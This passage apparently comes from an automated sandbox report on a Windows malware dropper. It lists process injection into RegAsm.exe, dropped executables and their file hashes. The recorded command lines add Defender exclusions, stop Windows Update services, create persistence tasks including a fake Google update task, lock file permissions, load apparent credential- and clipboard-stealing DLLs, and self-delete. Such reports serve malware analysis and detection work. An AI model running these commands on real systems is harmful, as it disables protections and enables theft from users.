PID 2120 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cacls.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 2104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 3332 wrote to memory of 912 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2104 wrote to memory of 4188 N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 4940 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 3332 wrote to memory of 8 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4188 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 3956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1412 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe
PID 3332 wrote to memory of 1732 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe
PID 3332 wrote to memory of 1732 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4188 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 3212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3332 wrote to memory of 1704 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3212 wrote to memory of 1512 N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp
PID 3332 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe
PID 3332 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 3332 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 2444 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 1704 wrote to memory of 4528 N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5020 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe
PID 4012 wrote to memory of 5100 N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

"C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

"C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe"

C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe

"C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe"

C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe

"C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe"

C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe

"C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe

"C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe"

C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe

"C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe"

C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe

"C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe" --silent --allusers=0

C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe

"C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe"

C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp" /SL5="$13004E,5025136,832512,C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe" --version

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4012 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005083209" --session-guid=ee4bd72b-54c0-4226-acb4-609088846ce7 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5005000000000000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\is-66CBQ.tmp\_isetup\_setup64.tmp

helper 105 0x43C

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2f4,0x2bc,0x2f8,0x6dd98538,0x6dd98548,0x6dd98554

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2bc,0x2f4,0x6f0c8538,0x6f0c8548,0x6f0c8554

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp" /SL5="$6021E,491750,408064,C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe

"C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe

"C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe"

C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe

"C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe" /VERYSILENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 812

C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp" /SL5="$D01C6,833775,56832,C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x10ee8a0,0x10ee8b0,0x10ee8bc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9375617347.exe"

C:\Users\Admin\AppData\Local\Temp\9375617347.exe

"C:\Users\Admin\AppData\Local\Temp\9375617347.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "jULbrBYpeg0IXpoPMkqW0pF3.exe" /f & erase "C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 912 -ip 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 1492

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "jULbrBYpeg0IXpoPMkqW0pF3.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 8 -ip 8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 684

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\9375617347.exe

Network


Files

memory/2120-0-0x00000000002A0000-0x00000000002E8000-memory.dmp

memory/2120-1-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/2120-2-0x0000000004DB0000-0x0000000004E4C000-memory.dmp

memory/2120-3-0x0000000005530000-0x0000000005AD4000-memory.dmp

memory/2120-4-0x0000000005080000-0x0000000005112000-memory.dmp

memory/2120-5-0x0000000005400000-0x0000000005410000-memory.dmp

memory/2120-6-0x0000000004C50000-0x0000000004C5A000-memory.dmp

memory/2120-7-0x0000000004D70000-0x0000000004D98000-memory.dmp

memory/2120-8-0x0000000005310000-0x000000000532A000-memory.dmp

memory/1304-9-0x00000000021B0000-0x00000000021E6000-memory.dmp

memory/1304-11-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/1304-12-0x0000000002230000-0x0000000002240000-memory.dmp

memory/1304-13-0x0000000004BC0000-0x00000000051E8000-memory.dmp

memory/1304-14-0x0000000002230000-0x0000000002240000-memory.dmp

memory/3332-10-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2120-17-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/3332-16-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/3332-18-0x0000000005680000-0x0000000005690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkyyypa3.ufr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1304-19-0x0000000005380000-0x00000000053A2000-memory.dmp

memory/1304-29-0x0000000005540000-0x00000000055A6000-memory.dmp

memory/1304-30-0x0000000005620000-0x0000000005686000-memory.dmp

memory/1304-31-0x0000000005690000-0x00000000059E4000-memory.dmp

C:\Users\Admin\Pictures\7XbwYRCELtuEskigfMcqyZ3a.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/1304-42-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\T5rEEY5jfgtmAbwNPPDalhWC.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

